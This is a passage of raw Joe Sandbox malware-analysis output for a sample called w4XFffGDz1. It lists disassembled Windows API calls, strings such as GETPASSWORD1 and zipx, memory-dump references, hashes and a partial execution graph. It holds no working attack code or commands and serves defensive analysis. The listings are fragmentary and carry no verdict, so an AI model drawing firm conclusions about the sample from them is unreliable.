                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00176209,?,000000FF,\\?\,B19080A7,?,000000FF,?,?,0019FF80,000000FF), ref: 00175DA4
                        • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,000000FF,?,?,0019FF80,000000FF), ref: 00175DD3
                        • _wcslen.LIBCMT ref: 00175DDC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CurrentDirectory$H_prolog3_wcslen
                        • String ID:
                        • API String ID: 19219720-0
                        • Opcode ID: e64675a5a319f41ae24190fadfbe7cc924a313fb88549cb03ff1bf25a824beab
                        • Instruction ID: e3fe21127b649653dc8f279dfb06843d0c1fe8460efb7d7d32e8918a4e3f3783
                        • Opcode Fuzzy Hash: e64675a5a319f41ae24190fadfbe7cc924a313fb88549cb03ff1bf25a824beab
                        • Instruction Fuzzy Hash: 91018672D00526BB8B10EFB88905ABFBB7AAF95710B154209F515AB241CF749A41CBE1
                        APIs
                        • SleepConditionVariableCS.KERNELBASE(?,0018CCFB,00000064), ref: 0018CD81
                        • LeaveCriticalSection.KERNEL32(001CB878,?,?,0018CCFB,00000064,?,?,?,?,?,00000000,001A0349,000000FF), ref: 0018CD8B
                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,0018CCFB,00000064,?,?,?,?,?,00000000,001A0349,000000FF), ref: 0018CD9C
                        • EnterCriticalSection.KERNEL32(001CB878,?,0018CCFB,00000064,?,?,?,?,?,00000000,001A0349,000000FF), ref: 0018CDA3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                        • String ID:
                        • API String ID: 3269011525-0
                        • Opcode ID: 358e9e2ecf4ed1fbabab33637256008cf2f9b5adbd9bc466a83bc52072c66591
                        • Instruction ID: 4da538f720b0f3ca8a78838d83228e47db30074cf49d11b482f9ad538c21f7eb
                        • Opcode Fuzzy Hash: 358e9e2ecf4ed1fbabab33637256008cf2f9b5adbd9bc466a83bc52072c66591
                        • Instruction Fuzzy Hash: 69E01231645124FBCB012BA9EC4AE993E6CEB55756F050125FA09F65608771D9A08BD0
                        APIs
                        • GetDC.USER32(00000000), ref: 00185C00
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00185C0F
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00185C1D
                        • ReleaseDC.USER32(00000000,00000000), ref: 00185C2B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: b8d550a1b5cfa7626f6149514a2ae32344152ef2a575aefc577ce5abf0d6428f
                        • Instruction ID: 042e738f62743ddde486658663a204d16895e9c77f17754a2818bdd16a851d89
                        • Opcode Fuzzy Hash: b8d550a1b5cfa7626f6149514a2ae32344152ef2a575aefc577ce5abf0d6428f
                        • Instruction Fuzzy Hash: AFE0EC36982B24EBD6215B746D0DF8B7F54AF05B52F004501F60AD6990CB78C891CFE1
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0017B4A9
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                          • Part of subcall function 001877DE: __EH_prolog3_GS.LIBCMT ref: 001877E5
                          • Part of subcall function 001877DE: GetLastError.KERNEL32(0000001C,0017B459,?,00000000,00000086,?,B19080A7,?,?,?,?,?,00000000,001A0349,000000FF), ref: 001877FD
                          • Part of subcall function 001877DE: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,001A0349,000000FF), ref: 00187836
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                        • String ID: %ls
                        • API String ID: 1279724102-3246610740
                        • Opcode ID: 8e0e95cf8bd9318c5e1b9342a7bef1414eb56f090c4ab0541798ce82ea8adc35
                        • Instruction ID: 0595540a24787430e2ac501200f71c3ea21af3761f9aa2d28d74f2406b2e0a5f
                        • Opcode Fuzzy Hash: 8e0e95cf8bd9318c5e1b9342a7bef1414eb56f090c4ab0541798ce82ea8adc35
                        • Instruction Fuzzy Hash: D3B1B071809209EEDB24EF64CD86BAE7BB4BF24304F21C419F54B621D1EBB46B54DB81
                        APIs
                          • Part of subcall function 00185C33: GetDC.USER32(00000000), ref: 00185C37
                          • Part of subcall function 00185C33: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00185C42
                          • Part of subcall function 00185C33: ReleaseDC.USER32(00000000,00000000), ref: 00185C4D
                        • GetObjectW.GDI32(?,00000018,?), ref: 00185FEE
                          • Part of subcall function 00186275: GetDC.USER32(00000000), ref: 0018627E
                          • Part of subcall function 00186275: GetObjectW.GDI32(?,00000018,?), ref: 001862AD
                          • Part of subcall function 00186275: ReleaseDC.USER32(00000000,?), ref: 00186345
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ObjectRelease$CapsDevice
                        • String ID: (
                        • API String ID: 1061551593-3887548279
                        • Opcode ID: bc9d7f9c3e3b4f07eb2312025bf6bc99c9753d3095e06c91fbe6d263c935051a
                        • Instruction ID: 6402300d2fdd97b437f2a5466050cca562d5397d7edd1bf07488e54104dbe3d6
                        • Opcode Fuzzy Hash: bc9d7f9c3e3b4f07eb2312025bf6bc99c9753d3095e06c91fbe6d263c935051a
                        • Instruction Fuzzy Hash: 2791EF716093549FC720DF29D848A2BBBE9FFC9B04F10495EF58AD3261CB70A905CB62
                        APIs
                        • _free.LIBCMT ref: 001986C4
                          • Part of subcall function 001914AB: IsProcessorFeaturePresent.KERNEL32(00000017,0019147D,0018C17E,?,?,?,0018C17E,00000016,?,?,0019148A,00000000,00000000,00000000,00000000,00000000), ref: 001914AD
                          • Part of subcall function 001914AB: GetCurrentProcess.KERNEL32(C0000417,?,0018C17E), ref: 001914CF
                          • Part of subcall function 001914AB: TerminateProcess.KERNEL32(00000000,?,0018C17E), ref: 001914D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                        • String ID: *?$.
                        • API String ID: 2667617558-3972193922
                        • Opcode ID: b63559d0858a43ca95d39679e396630d290c71714544b7807d7bcc40eb2fce06
                        • Instruction ID: f26d657d3f8f995cf6a5d7898ba734730f263ba9fc2af9368157cd91b140abc1
                        • Opcode Fuzzy Hash: b63559d0858a43ca95d39679e396630d290c71714544b7807d7bcc40eb2fce06
                        • Instruction Fuzzy Hash: 5751A175E0020AAFDF14DFA8C881AADBBF5FF59314F258169E844EB341EB359E018B50
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 0017F9DB
                          • Part of subcall function 00174C75: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174C9D
                          • Part of subcall function 0017CB19: _swprintf.LIBCMT ref: 0017CB52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CloseFindH_prolog3__swprintf
                        • String ID: zip$zipx
                        • API String ID: 4097574867-1268445101
                        • Opcode ID: 2f2e68ad0c6ac5b4c4b51193b170643740c91c9844699e45e661e201ff4d0d75
                        • Instruction ID: 12518d8b7a476e670deceb6ebe5f76f718afa7841ed63f6050fa20202decbd29
                        • Opcode Fuzzy Hash: 2f2e68ad0c6ac5b4c4b51193b170643740c91c9844699e45e661e201ff4d0d75
                        • Instruction Fuzzy Hash: F2518F70904218DBCB19DF68EC95BAE7BB1BF58318F14812EF409D3691DB309D86CB11
                        APIs
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0018FBDF
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0018FC93
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 3480331319-1018135373
                        • Opcode ID: 00be55930afa8f424593b895d3d8946e8dc458e716e5cdd3564482c3dc9870e2
                        • Instruction ID: 1dd008886a5fec5ec06f88a8e0496609dc35dc3674ae95e02c039871553fa050
                        • Opcode Fuzzy Hash: 00be55930afa8f424593b895d3d8946e8dc458e716e5cdd3564482c3dc9870e2
                        • Instruction Fuzzy Hash: C7419F34A0021CAFCF10EF68C885A9EBBB5EF55314F148169EC149B396D731AB52CF90
                        APIs
                        • __EH_prolog3.LIBCMT ref: 00184BA5
                          • Part of subcall function 00174FA6: __EH_prolog3.LIBCMT ref: 00174FAD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3
                        • String ID: Shell.Explorer$about:blank
                        • API String ID: 431132790-874089819
                        • Opcode ID: 9dc57bbeca739740b69a291ec50cb88ece6fcd88d68a77100a603668035314e5
                        • Instruction ID: 91094ff62e75e010bb635a06d856fa8333b1ad3db375aed3eceb85162da78a2d
                        • Opcode Fuzzy Hash: 9dc57bbeca739740b69a291ec50cb88ece6fcd88d68a77100a603668035314e5
                        • Instruction Fuzzy Hash: F8413C747016029FDB18EF68D991B6A77B6BF99700F24805DE8069B2A1DF71AE00CF60
                        APIs
                          • Part of subcall function 00171B78: GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
                          • Part of subcall function 00171B78: SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2
                        • EndDialog.USER32(?,00000001), ref: 001870DB
                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 00187119
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ItemText$DialogWindow
                        • String ID: GETPASSWORD1
                        • API String ID: 445417207-3292211884
                        • Opcode ID: 9454e97e11ac7e17239c844bd62928f399d569632e51e1d0008844246de37b8f
                        • Instruction ID: f2e2c95e3288d908767cd18e676ac1b2de645bb58242e31a70d6fda657b95a83
                        • Opcode Fuzzy Hash: 9454e97e11ac7e17239c844bd62928f399d569632e51e1d0008844246de37b8f
                        • Instruction Fuzzy Hash: B4110BB2508308AAD230EA649C49FFB77ACEB95700F104829F749E74C1C731ED458BB5
                        APIs
                          • Part of subcall function 00178C09: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00178C28
                          • Part of subcall function 00178C09: GetProcAddress.KERNEL32(001BA138,CryptUnprotectMemory), ref: 00178C38
                        • GetCurrentProcessId.KERNEL32(?,?,?,00178C79), ref: 00178D0C
                        Strings
                        • CryptProtectMemory failed, xrefs: 00178CC3
                        • CryptUnprotectMemory failed, xrefs: 00178D04
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AddressProc$CurrentProcess
                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                        • API String ID: 2190909847-396321323
                        • Opcode ID: c59aded472f956cb085b1712dc51f494fecea7b26460c7367695242f2e44f40e
                        • Instruction ID: 1964aaf0809587cac4553e44a04d4fd54ba29b3703e605ff66cd6ecc516f8076
                        • Opcode Fuzzy Hash: c59aded472f956cb085b1712dc51f494fecea7b26460c7367695242f2e44f40e
                        • Instruction Fuzzy Hash: 72115B31A462246BCB365F28DC09AAE3B74EF25760B04C109FC096B2D1CF349D418BE1
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 0017CA76
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3__wcslen
                        • String ID: .zipx$.zx
                        • API String ID: 3251556500-3683210447
                        • Opcode ID: 05a6437ac255013e43e4e40e8c0b30b8ecde0bf62870a67bb533f659ab941e38
                        • Instruction ID: 0bd89d91c30c78e8442d5db11502e7283e7efe42f471c5ba95ebfc04f6373933
                        • Opcode Fuzzy Hash: 05a6437ac255013e43e4e40e8c0b30b8ecde0bf62870a67bb533f659ab941e38
                        • Instruction Fuzzy Hash: 3A11307490034C9EDB05EFE4CC96ADDBBB8AF18354F048029E419BB182EB709E45CFA0
                        APIs
                        • IsWindowVisible.USER32(0001048C), ref: 0018B06B
                        • DialogBoxParamW.USER32(GETPASSWORD1,0001048C,00187070,?), ref: 0018B094
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: DialogParamVisibleWindow
                        • String ID: GETPASSWORD1
                        • API String ID: 3157717868-3292211884
                        • Opcode ID: 77bbcad6d2536cb9fa3b7b2c516a6095aa5a4a95da39cc44d32b2069360027d1
                        • Instruction ID: feebba3f64c19bc849bab5fb19d4657c09b2c6ebb0d6c325d4e523f839b1dff8
                        • Opcode Fuzzy Hash: 77bbcad6d2536cb9fa3b7b2c516a6095aa5a4a95da39cc44d32b2069360027d1
                        • Instruction Fuzzy Hash: 6E012670289248ABC726AF64DC95F9B3F69AF12309B458119F81493591C370DE80CFA2
                        APIs
                          • Part of subcall function 00177B5C: _swprintf.LIBCMT ref: 00177B9C
                          • Part of subcall function 00177B5C: SetDlgItemTextW.USER32(?,001AE16C,?), ref: 00177C16
                          • Part of subcall function 00177B5C: GetWindowRect.USER32(?,?), ref: 00177C4C
                          • Part of subcall function 00177B5C: GetClientRect.USER32(?,?), ref: 00177C58
                        • GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
                        • SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ItemRectTextWindow$Client_swprintf
                        • String ID: 0
                        • API String ID: 758586884-4108050209
                        • Opcode ID: 811c84b9fe35ac4a0a23fb546af70fe34bdeeb8ecd16ae42e33c6531c2362d3e
                        • Instruction ID: fe3e1f9fdc242de18e8f3e3f6c2799f7ed9c76beab8f713d2f6a8995daf13e85
                        • Opcode Fuzzy Hash: 811c84b9fe35ac4a0a23fb546af70fe34bdeeb8ecd16ae42e33c6531c2362d3e
                        • Instruction Fuzzy Hash: E1F03130108248BBDF191FA99C09EB93F78AB1A305F04C014FC8D56592D774D895DAA0
                        APIs
                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0018C199
                          • Part of subcall function 0018C11B: std::exception::exception.LIBCONCRT ref: 0018C128
                          • Part of subcall function 0018DD8A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,0018C18C,?,001ABFA0,?), ref: 0018DDEA
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018C1BF
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionRaiseSectionWrite$AcquireHelper2@8LoadRelease___delaystd::exception::exceptionstd::invalid_argument::invalid_argument
                        • String ID: @Ut
                        • API String ID: 2834720752-141846247
                        • Opcode ID: 60faebab791d9d24becdfabd0ba8a24da875a4dfe187bd0520ecce3ee37f082e
                        • Instruction ID: 09eb46d6c03a76f7a13b68752c3d61edf2e72f5ca437857b1c664254d7a7bd36
                        • Opcode Fuzzy Hash: 60faebab791d9d24becdfabd0ba8a24da875a4dfe187bd0520ecce3ee37f082e
                        • Instruction Fuzzy Hash: D0D05BED904148BED704B6E0DD57C7D772C8B55700B508556F910D1483D7B06B154FF1
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000064,00000000,00000000,?,?,?,00000000,0000005C,B19080A7), ref: 00177B17
                        • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00177B25
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FindHandleModuleResource
                        • String ID: RTL
                        • API String ID: 3537982541-834975271
                        • Opcode ID: 27e9a7e5b91b22c9631e89458ee3ecb4461f18b27fbac7fd4b5de79ee736d7c5
                        • Instruction ID: e71527b9057f6ebf25998621916b82c9b4d17113ca241bc03a5f84acbe2b3ed4
                        • Opcode Fuzzy Hash: 27e9a7e5b91b22c9631e89458ee3ecb4461f18b27fbac7fd4b5de79ee736d7c5
                        • Instruction Fuzzy Hash: F6C01231648B11AAE63117797D4DB833A68AB02B11F068548F541DB8C0DAF6E8C1CBA0

                        Execution Graph

                        Execution Coverage:13.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:230
                        Total number of Limit Nodes:11
                        execution_graph 42797 fcb758 42798 fcb79a 42797->42798 42799 fcb7a0 GetModuleHandleW 42797->42799 42798->42799 42800 fcb7cd 42799->42800 43064 fcdc08 43065 fcdc4e 43064->43065 43068 fcdde8 43065->43068 43071 fcc2e0 43068->43071 43072 fcde50 DuplicateHandle 43071->43072 43073 fcdd3b 43072->43073 42801 7a58700 42802 7a5888b 42801->42802 42804 7a58726 42801->42804 42804->42802 42805 7a5592c 42804->42805 42806 7a58980 PostMessageW 42805->42806 42807 7a589ec 42806->42807 42807->42804 42777 fc4670 42778 fc467a 42777->42778 42780 fc4b68 42777->42780 42781 fc4b8d 42780->42781 42785 fc4c68 42781->42785 42789 fc4c78 42781->42789 42782 fc4b97 42782->42778 42786 fc4c75 42785->42786 42787 fc4c64 42786->42787 42793 fc4850 42786->42793 42787->42782 42787->42787 42790 fc4c9f 42789->42790 42791 fc4850 CreateActCtxA 42790->42791 42792 fc4d7c 42790->42792 42791->42792 42794 fc5d08 CreateActCtxA 42793->42794 42796 fc5dcb 42794->42796 43074 fcb800 43075 fcb814 43074->43075 43076 fcb839 43075->43076 43078 fca908 43075->43078 43079 fcb9e0 LoadLibraryExW 43078->43079 43081 fcba59 43079->43081 43081->43076 42808 70e2b20 42809 70e2be5 42808->42809 42810 70e2b4a 42808->42810 42814 5b74a90 